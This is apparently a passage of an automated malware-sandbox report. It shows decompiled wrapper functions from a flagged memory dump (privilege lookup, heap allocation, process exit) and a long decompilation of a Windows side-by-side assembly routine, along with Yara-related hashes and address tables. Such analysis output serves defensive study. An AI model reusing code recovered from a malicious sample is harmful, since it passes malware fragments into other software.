                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                                                    • Instruction ID: ccd65e455a6766b961bfcedf9323f9111758d35f24f5cf189e0879c04bc11aef
                                                                                                                                                    • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                                                    • Instruction Fuzzy Hash: B5015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 31%
                                                                                                                                                    			E00418621(signed int __eax, void* __ecx, char _a1, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
				int _t12;
				void* _t19;

				_pop(_t19);
				asm("rcr byte [edi], cl");
				 *(__eax | 0x00000077) = __ecx;
				asm("sbb al, 0xdd");
				asm("pushad");
				asm("sbb al, 0x55");
				_push( &_a1);
				_t9 = _a8;
				E00418DC0(_t19, _a8, _a8 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
				return _t12;
			}





                                                                                                                                                    0x00418621
                                                                                                                                                    0x00418624
                                                                                                                                                    0x00418626
                                                                                                                                                    0x0041862a
                                                                                                                                                    0x0041862c
                                                                                                                                                    0x0041862f
                                                                                                                                                    0x00418630
                                                                                                                                                    0x00418633
                                                                                                                                                    0x0041864a
                                                                                                                                                    0x00418660
                                                                                                                                                    0x00418664

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: eb9c3a68470602d4ee57248bafbd6fdaa18c2b3ae0cd3609ed2cf1bb9625f3f3
                                                                                                                                                    • Instruction ID: 913cad60e73bde2b2bc07f56f1a0e66b5e8f903dfe318d30b5bb156a9fafa28f
                                                                                                                                                    • Opcode Fuzzy Hash: eb9c3a68470602d4ee57248bafbd6fdaa18c2b3ae0cd3609ed2cf1bb9625f3f3
                                                                                                                                                    • Instruction Fuzzy Hash: 8DF0A0B5200204ABDB10DF54D840EE77B68DF46710F1084A9FA0857342CA30A9058BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                    0x004184df
                                                                                                                                                    0x004184e7
                                                                                                                                                    0x004184fd
                                                                                                                                                    0x00418501

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                    0x004184a7
                                                                                                                                                    0x004184bd
                                                                                                                                                    0x004184c1

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                    0x0041864a
                                                                                                                                                    0x00418660
                                                                                                                                                    0x00418664

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                    0x00418513
                                                                                                                                                    0x0041852a
                                                                                                                                                    0x00418538

                                                                                                                                                    APIs
                                                                                                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00C8C5F0, Relevance: 14.2, Strings: 11, Instructions: 424COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                    			E00C8C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v544;
				char _v1064;
				char _v1068;
				char _v1069;
				signed short* _v1076;
				signed short _v1080;
				intOrPtr _v1084;
				signed short _v1086;
				char _v1088;
				char _v1092;
				signed short _v1096;
				char _v1100;
				char* _v1104;
				short _v1106;
				char _v1108;
				char _v1111;
				char _v1112;
				signed short _v1116;
				char _v1120;
				intOrPtr _v1124;
				short _v1126;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				char* _v1156;
				short _v1158;
				char _v1160;
				intOrPtr _v1164;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				char* _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t173;
				intOrPtr _t175;
				void* _t191;
				void* _t193;
				intOrPtr _t200;
				char _t215;
				void* _t226;
				signed short _t250;
				void* _t284;
				signed short _t286;
				unsigned int _t292;
				short _t294;
				signed int _t295;
				void* _t296;

				_t173 =  *0xd42088; // 0x777dc194
				_v8 = _t173 ^ _t295;
				_t175 = _a4;
				_t272 = _a8;
				_v1132 = _a16;
				_v1140 = _a20;
				_v1160 = 0;
				_v1158 = 0x208;
				_v1156 =  &_v1064;
				_t282 = 0;
				_t288 = 0;
				_t286 = _a12;
				_v1164 = _t175;
				_v1069 = 0;
				_v1068 = 0;
				_v1136 = 0;
				_v1088 = 0;
				_v1086 = 0;
				_v1084 = 0;
				_v1128 = 0;
				_v1126 = 0;
				_v1124 = 0;
				_v1144 = 0;
				if(_t175 == 0) {
					_t282 = 0;
					L66:
					_push(_t282);
					_push(_t286);
					_push(_t272);
					_push(_t175);
					L00CB3F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t288 = 0xc000000d;
					L18:
					if(_v1069 == 0) {
						L20:
						if(_v1084 != 0) {
							 *0xc6e6f0(_v1084);
						}
						if(_v1068 != 0) {
							E00C5F9F0(_v1068);
						}
						if(_v1136 != 0) {
							E00C6E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
						}
						L23:
						return E00C6E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
					}
					L19:
					_v1120 = _v1144;
					_v1132(4,  &_v1120, _v1140);
					goto L20;
				}
				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
					_t282 =  *((intOrPtr*)(_t175 + 4));
					goto L66;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
						goto L23;
					}
					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
					_t291 =  *((intOrPtr*)(_t191 + 0x50));
					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
						_push(_t272);
						L00CB3F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
						L39:
						_t288 = 0xc0000106;
						goto L20;
					}
					if(( *(_t191 + 4) & 0x00000010) != 0) {
						L27:
						_v1076 =  &_v1160;
						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
						_v1080 = _t286;
						if(_t286 == 0) {
							_t288 = 0xc00000e5;
							goto L23;
						}
						_t193 = E00C78342(_t286, 0x5c);
						_pop(_t272);
						if(_t193 == 0) {
							_t288 = 0xc00000e5;
							goto L20;
						}
						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
						if(_t286 > 0x208) {
							if(_t286 > 0xfffe) {
								goto L39;
							}
							_v1086 = _t286;
							_t200 =  *0xc6e6f4(_t286 & 0x0000ffff);
							_v1084 = _t200;
							if(_t200 != 0) {
								_v1076 =  &_v1088;
								goto L30;
							}
							_t288 = 0xc0000017;
							goto L20;
						}
						L30:
						_t292 = _t286 & 0x0000ffff;
						E00C62340(_v1076[2], _v1080, _t292 - 2);
						_t272 = 0;
						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
						_t296 = _t296 + 0xc;
						 *_v1076 = _t286;
						L15:
						if(_v1068 == 0) {
							if(L00C7DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
								L00CB3F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
								_t288 = 0xc000003a;
								goto L18;
							}
							_v1136 = _v1124;
							_t215 = _v1180;
							if(_t215 != 0) {
								_v1128 = _t215;
								_v1124 = _v1176;
							} else {
								_v1172 = 0;
							}
							_v1200 = _v1172;
							_push(0x21);
							_v1196 =  &_v1128;
							_push(3);
							_push( &_v1212);
							_push( &_v1204);
							_push(0x100020);
							_v1204 = 0x18;
							_v1192 = 0x40;
							_v1188 = 0;
							_v1184 = 0;
							_t288 = L00C5FD74( &_v1068);
							E00C7A331( &_v1180, _t272,  &_v1180);
							if(_t288 >= 0) {
								goto L16;
							} else {
								_push(_t288);
								L00CB3F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
								goto L18;
							}
						}
						L16:
						_t226 = L00C8CC91(_v1164, _a12, _v1076,  &_v1068);
						_t288 = _t226;
						if(_t226 < 0) {
							L00CB3F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
						} else {
							_t288 = 0;
						}
						goto L18;
					}
					_v1076 = 0;
					_t294 =  *((intOrPtr*)(_t191 + 0x50));
					_v1152 = _t294;
					_v1150 = _t294;
					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
					_v1108 = 0;
					_v1106 = 0x216;
					_v1104 =  &_v544;
					_v1120 = _t272;
					_v1116 = _t286;
					_v1112 = 0;
					_v1100 = 0;
					_v1092 = 0;
					_v1096 = 0;
					_v1132(1,  &_v1120, _v1140);
					if(_v1092 != 0) {
						_t288 = 0xc0000120;
						goto L20;
					}
					if(_v1100 != 0) {
						_t288 = E00C8D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
						if(_t288 >= 0) {
							_t288 = L00C8CC91(_v1164, _t286,  &_v1108,  &_v1068);
							if(_t288 >= 0) {
								_t288 = 0;
								goto L20;
							}
							_push(_t288);
							_push(_t286);
							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
							L50:
							_push(0);
							_push(0x33);
							L00CB3F92();
							goto L20;
						}
						_push(_t288);
						_push( &_v1108);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L50;
					}
					_v1144 = _v1112;
					_t250 = _v1096;
					_t286 = 0;
					_v1080 = _t250;
					_v1069 = 1;
					if(_t250 <= 0) {
						L14:
						if(_t286 == _v1080) {
							L59:
							_push(_t286);
							L00CB3F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t288 = 0xc0150004;
							goto L19;
						}
						goto L15;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1120 = _v1144;
						_v1108 = 0;
						_v1106 = 0x216;
						_v1104 =  &_v544;
						_v1116 = _t286;
						_v1112 = 0;
						_v1111 = 0;
						_v1132(2,  &_v1120, _v1140);
						if(_v1112 != 0) {
							break;
						}
						if(_v1111 != 0) {
							if(_v1108 == 0) {
								goto L59;
							}
							_t159 = _t286 + 1; // 0x1
							_v1080 = _t159;
						}
						if(_v1108 != 0) {
							if(_v1068 != 0) {
								E00C5F9F0(_v1068);
								_v1068 = 0;
							}
							_t288 = E00C8D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
							if(_t288 >= 0) {
								goto L14;
							} else {
								if(_t288 == 0xc0150004) {
									goto L13;
								} else {
									_push(_t288);
									_push( &_v1152);
									L00CB3F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
									goto L19;
								}
								goto L27;
							}
						}
						L13:
						_t286 = _t286 + 1;
						if(_t286 < _v1080) {
							continue;
						}
						goto L14;
					}
					_t288 = 0xc0000120;
					goto L19;
				}
			}
































































                                                                                                                                                    0x00c8c5fb
                                                                                                                                                    0x00c8c602
                                                                                                                                                    0x00c8c608
                                                                                                                                                    0x00c8c60b
                                                                                                                                                    0x00c8c60e
                                                                                                                                                    0x00c8c617
                                                                                                                                                    0x00c8c61f
                                                                                                                                                    0x00c8c62e
                                                                                                                                                    0x00c8c63c
                                                                                                                                                    0x00c8c642
                                                                                                                                                    0x00c8c644
                                                                                                                                                    0x00c8c647
                                                                                                                                                    0x00c8c64a
                                                                                                                                                    0x00c8c650
                                                                                                                                                    0x00c8c656
                                                                                                                                                    0x00c8c65c
                                                                                                                                                    0x00c8c662
                                                                                                                                                    0x00c8c669
                                                                                                                                                    0x00c8c670
                                                                                                                                                    0x00c8c676
                                                                                                                                                    0x00c8c67d
                                                                                                                                                    0x00c8c684
                                                                                                                                                    0x00c8c68a
                                                                                                                                                    0x00c8c692
                                                                                                                                                    0x00cc557b
                                                                                                                                                    0x00cc557d
                                                                                                                                                    0x00cc557d
                                                                                                                                                    0x00cc557e
                                                                                                                                                    0x00cc557f
                                                                                                                                                    0x00cc5580
                                                                                                                                                    0x00cc558e
                                                                                                                                                    0x00cc5596
                                                                                                                                                    0x00c8c874
                                                                                                                                                    0x00c8c87a
                                                                                                                                                    0x00c8c89d
                                                                                                                                                    0x00c8c8a3
                                                                                                                                                    0x00cc55a6
                                                                                                                                                    0x00cc55a6
                                                                                                                                                    0x00c8c8af
                                                                                                                                                    0x00cc55b7
                                                                                                                                                    0x00cc55b7
                                                                                                                                                    0x00c8c8bb
                                                                                                                                                    0x00ca22ee
                                                                                                                                                    0x00ca22ee
                                                                                                                                                    0x00c8c8c1
                                                                                                                                                    0x00c8c8d1
                                                                                                                                                    0x00c8c8d1
                                                                                                                                                    0x00c8c87c
                                                                                                                                                    0x00c8c888
                                                                                                                                                    0x00c8c897
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c897
                                                                                                                                                    0x00c8c69a
                                                                                                                                                    0x00ca22f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c6b2
                                                                                                                                                    0x00c8c6b8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c6c6
                                                                                                                                                    0x00c8c6d4
                                                                                                                                                    0x00c8c6d6
                                                                                                                                                    0x00c8c6d9
                                                                                                                                                    0x00c8c6e1
                                                                                                                                                    0x00cc5384
                                                                                                                                                    0x00cc538e
                                                                                                                                                    0x00cc5396
                                                                                                                                                    0x00cc5396
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc5396
                                                                                                                                                    0x00c8c6eb
                                                                                                                                                    0x00ca2196
                                                                                                                                                    0x00ca219c
                                                                                                                                                    0x00ca21a5
                                                                                                                                                    0x00ca21a7
                                                                                                                                                    0x00ca21ad
                                                                                                                                                    0x00cc53a0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53a0
                                                                                                                                                    0x00ca21b6
                                                                                                                                                    0x00ca21bc
                                                                                                                                                    0x00ca21bf
                                                                                                                                                    0x00cc53aa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53aa
                                                                                                                                                    0x00ca21cd
                                                                                                                                                    0x00ca21d8
                                                                                                                                                    0x00cc53bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53c2
                                                                                                                                                    0x00cc53c9
                                                                                                                                                    0x00cc53cf
                                                                                                                                                    0x00cc53d7
                                                                                                                                                    0x00cc53e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53e9
                                                                                                                                                    0x00cc53d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53d9
                                                                                                                                                    0x00ca21de
                                                                                                                                                    0x00ca21de
                                                                                                                                                    0x00ca21f4
                                                                                                                                                    0x00ca2204
                                                                                                                                                    0x00ca2206
                                                                                                                                                    0x00ca2211
                                                                                                                                                    0x00ca2217
                                                                                                                                                    0x00c8c841
                                                                                                                                                    0x00c8c847
                                                                                                                                                    0x00ca223e
                                                                                                                                                    0x00cc5405
                                                                                                                                                    0x00cc540d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc540d
                                                                                                                                                    0x00ca224a
                                                                                                                                                    0x00ca2250
                                                                                                                                                    0x00ca2259
                                                                                                                                                    0x00cc552f
                                                                                                                                                    0x00cc553b
                                                                                                                                                    0x00ca225f
                                                                                                                                                    0x00ca225f
                                                                                                                                                    0x00ca225f
                                                                                                                                                    0x00ca226b
                                                                                                                                                    0x00ca2271
                                                                                                                                                    0x00ca2279
                                                                                                                                                    0x00ca227f
                                                                                                                                                    0x00ca2287
                                                                                                                                                    0x00ca228e
                                                                                                                                                    0x00ca228f
                                                                                                                                                    0x00ca229b
                                                                                                                                                    0x00ca22a5
                                                                                                                                                    0x00ca22af
                                                                                                                                                    0x00ca22b5
                                                                                                                                                    0x00ca22c0
                                                                                                                                                    0x00ca22c9
                                                                                                                                                    0x00ca22d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca22d6
                                                                                                                                                    0x00cc554c
                                                                                                                                                    0x00cc5558
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc555d
                                                                                                                                                    0x00ca22d0
                                                                                                                                                    0x00c8c84d
                                                                                                                                                    0x00c8c863
                                                                                                                                                    0x00c8c868
                                                                                                                                                    0x00c8c86c
                                                                                                                                                    0x00cc556e
                                                                                                                                                    0x00c8c872
                                                                                                                                                    0x00c8c872
                                                                                                                                                    0x00c8c872
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c86c
                                                                                                                                                    0x00c8c6f7
                                                                                                                                                    0x00c8c6fd
                                                                                                                                                    0x00c8c701
                                                                                                                                                    0x00c8c708
                                                                                                                                                    0x00c8c714
                                                                                                                                                    0x00c8c71c
                                                                                                                                                    0x00c8c728
                                                                                                                                                    0x00c8c735
                                                                                                                                                    0x00c8c744
                                                                                                                                                    0x00c8c74a
                                                                                                                                                    0x00c8c750
                                                                                                                                                    0x00c8c756
                                                                                                                                                    0x00c8c75c
                                                                                                                                                    0x00c8c762
                                                                                                                                                    0x00c8c768
                                                                                                                                                    0x00c8c774
                                                                                                                                                    0x00cc5417
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc5417
                                                                                                                                                    0x00c8c780
                                                                                                                                                    0x00cc5451
                                                                                                                                                    0x00cc5455
                                                                                                                                                    0x00cc548e
                                                                                                                                                    0x00cc5492
                                                                                                                                                    0x00cc549d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc549d
                                                                                                                                                    0x00cc5494
                                                                                                                                                    0x00cc5495
                                                                                                                                                    0x00cc5496
                                                                                                                                                    0x00cc5464
                                                                                                                                                    0x00cc5464
                                                                                                                                                    0x00cc5465
                                                                                                                                                    0x00cc5467
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc546c
                                                                                                                                                    0x00cc5457
                                                                                                                                                    0x00cc545e
                                                                                                                                                    0x00cc545f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc545f
                                                                                                                                                    0x00c8c78c
                                                                                                                                                    0x00c8c792
                                                                                                                                                    0x00c8c798
                                                                                                                                                    0x00c8c79a
                                                                                                                                                    0x00c8c7a0
                                                                                                                                                    0x00c8c7a9
                                                                                                                                                    0x00c8c835
                                                                                                                                                    0x00c8c83b
                                                                                                                                                    0x00cc54df
                                                                                                                                                    0x00cc54df
                                                                                                                                                    0x00cc54ef
                                                                                                                                                    0x00cc54f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc54f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c7af
                                                                                                                                                    0x00c8c7af
                                                                                                                                                    0x00c8c7bb
                                                                                                                                                    0x00c8c7c3
                                                                                                                                                    0x00c8c7cf
                                                                                                                                                    0x00c8c7dc
                                                                                                                                                    0x00c8c7eb
                                                                                                                                                    0x00c8c7f1
                                                                                                                                                    0x00c8c7f7
                                                                                                                                                    0x00c8c7fd
                                                                                                                                                    0x00c8c809
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c815
                                                                                                                                                    0x00cc54ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc54ad
                                                                                                                                                    0x00cc54b0
                                                                                                                                                    0x00cc54b0
                                                                                                                                                    0x00c8c822
                                                                                                                                                    0x00c8d03e
                                                                                                                                                    0x00cc54c1
                                                                                                                                                    0x00cc54c6
                                                                                                                                                    0x00cc54c6
                                                                                                                                                    0x00c8d074
                                                                                                                                                    0x00c8d078
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8d07e
                                                                                                                                                    0x00cc54d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc54dd
                                                                                                                                                    0x00cc550b
                                                                                                                                                    0x00cc5512
                                                                                                                                                    0x00cc5522
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc5527
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc54d7
                                                                                                                                                    0x00c8d078
                                                                                                                                                    0x00c8c828
                                                                                                                                                    0x00c8c828
                                                                                                                                                    0x00c8c82f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c82f
                                                                                                                                                    0x00cc5501
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc5501

                                                                                                                                                    Strings
                                                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 00CC5581
                                                                                                                                                    • @, xrefs: 00CA22A5
                                                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00CC5586
                                                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00CC5566
                                                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00CC5550
                                                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00CC551A
                                                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00CC54E7
                                                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00CC545F
                                                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00CC5386
